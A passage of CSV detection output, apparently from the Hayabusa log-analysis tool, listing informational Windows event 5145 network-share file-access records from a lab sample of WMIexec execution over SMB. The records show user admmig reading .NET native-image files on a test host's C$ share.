+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.426 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti31fd6628#\1a6ec0d19dfcc35f62014ff3602e6a54 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Acti2661942e#\86d8003fea61ae88dd34584f08a9393c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Actif3565cbd#\a6af57d6c4eee4a8e0165604baa15b61 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.443 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Activities\16738205fa35676f5eda6d7d70169936 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddI3d71a354#\0a1d9187e911a67185317ffa7ee40ef0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.AddIn\14b968adbdb2082b1b938b20b5cb24b5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.458 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp7dda8007#\10dd4c410de361a8ee03b5b7c662ccc9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Comp46f2b404#\7845e0cf7da2edf653fbcc126cda2f48 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Compba577418#\9db094774e9db914aedfcad797c955d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.475 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\c8152fae930d6b5e4dd5323561626549 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\c5bf2f5c3e13726b3984a900221e1778 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Core\c1194e56644c7688e7eb0f68a57dcc30 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data\8a7f63a63249ceccb5c51a9a372aaf64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Entity\9332198f4736c780facfd62fead6fa26 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Linq\afe9ad217242ffe7adeeebf7417a0e56 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.491 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.Services\ee663803638dd6a1e68078d00330c716 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data.SqlXml\a686774445eff8eba0a781106f24b040 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.506 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data14bed3a9#\6255822d609f7753b8b77a030c397503 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data7706cdc8#\730ce0d11e99c329a9ab7bd75787f1bf : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.537 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data86569bbf#\3d5b722235db7e8a8c7d1344c7221c33 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Data16016462#\003de8140f5201b90706bed8c0b34d9a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Datab086ae17#\8b98eff35de01ce97f419f50f85f6123 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.553 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Deployment\53494598e1b6d05a1c7e3020cc4e9106 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Design\52a567b78cdfcd6f0926ba88bd575776 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Device\7270490235668fa0578aec716a28ce87 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire5d62f0a2#\54c0c8fb72275b54709f09380c489b31 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.569 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dire573b08f5#\8f83846bacd706e939a5ed0f8b5e3a25 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#\8f81b927dcc93ba9ce82d9b8a45d3ee6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Draw0a54d252#\37cc106c66bc77ec23840bde30a2b4ad : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:30.584 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing : IP Address: 